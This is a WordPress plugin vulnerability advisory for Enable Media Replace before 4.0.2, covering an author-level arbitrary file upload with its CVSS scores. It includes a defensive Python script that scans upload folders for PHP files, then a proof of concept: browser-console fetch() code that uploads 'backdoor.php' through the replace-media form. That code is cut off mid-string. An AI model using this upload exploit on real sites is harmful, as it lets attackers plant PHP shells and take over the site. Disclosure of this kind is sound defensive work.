wpvulndb | Dc11 | WPVDB-ID:B0239208-1E23-4774-9B8C-9611704A07A0
Jan 17, 2023 - 12:00 a.m.

Enable Media Replace < 4.0.2 - Author+ Arbitrary File Upload

2023-01-17 00:00:00
dc11
wpscan.com

CVSS3: 8.8 High

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS: 0.001 Low
Percentile: 16.9%

The plugin does not prevent authors from uploading arbitrary files to the site, which may allow them to upload PHP shells on affected sites.
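
A triage check for the condition described above, added here as an example (not code from WPScan or from the plugin): it walks an uploads tree and flags files that a web server might hand to the PHP interpreter. The extension list, marker bytes and function names are assumptions, and the sample tree is constructed with harmless placeholder contents.

```python
from pathlib import Path
import tempfile

# Extensions often routed to the PHP handler (assumption: depends on server config).
PHP_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".pht"}
PHP_MARKERS = (b"<?php", b"<?=")  # triage signal only; hits need manual review


def classify(path, sniff_bytes=4096):
    """Return a reason string if the file looks PHP-executable, else None."""
    exts = [s.lower() for s in Path(path).suffixes]
    if exts and exts[-1] in PHP_EXTS:
        return "php-extension"
    if any(e in PHP_EXTS for e in exts):
        return "php-inner-extension"  # e.g. name.php.png
    try:
        with open(path, "rb") as fh:
            head = fh.read(sniff_bytes)
    except OSError:
        return "unreadable"
    if any(marker in head for marker in PHP_MARKERS):
        return "php-marker-in-content"  # PHP tag hidden behind a media extension
    return None


def audit_uploads(root):
    """Walk an uploads tree; return (relative_path, reason) pairs sorted by path."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        reason = classify(path) if path.is_file() else None
        if reason:
            findings.append((path.relative_to(root).as_posix(), reason))
    return findings


def demo():
    """Build a constructed sample tree (placeholder contents) and audit it."""
    sample = {
        "2023/01/photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
        "2023/01/backdoor.php": b"<?php /* placeholder */",
        "2023/01/banner.php.png": b"\x89PNG\r\n\x1a\n",
        "2023/01/avatar.gif": b"GIF89a<?php /* placeholder */",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, data in sample.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(data)
        return audit_uploads(root)
```

On a real site, point `audit_uploads` at the WordPress uploads directory (`wp-content/uploads` by default) and review each hit by hand.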

PoC

  1. As an Author, upload a picture via http://vulnerable-site.tld/wp-admin/upload.php
  2. Press on the new picture’s thumbnail to see the attachment’s details
  3. Click on “Upload a new file”, next to “Replace media”
  4. Paste the following in your browser’s developer console:

```
await fetch(document.forms[0].action, {
  "credentials": "include",
  "headers": {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
    "Content-Type": "multipart/form-data; boundary=---------------------------294159958331225347843177109147",
    "Upgrade-Insecure-Requests": "1"
  },
  "body": `-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name="ID"\r\n\r\n${document.forms[0].action.match(/attachment_id=(\d+)/)[1]}\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name="userfile"; filename="backdoor.php"\r\nContent-Type: text/php\r\n\r\n
```

CPE Name              Operator  Version
enable-media-replace  lt        4.0.2
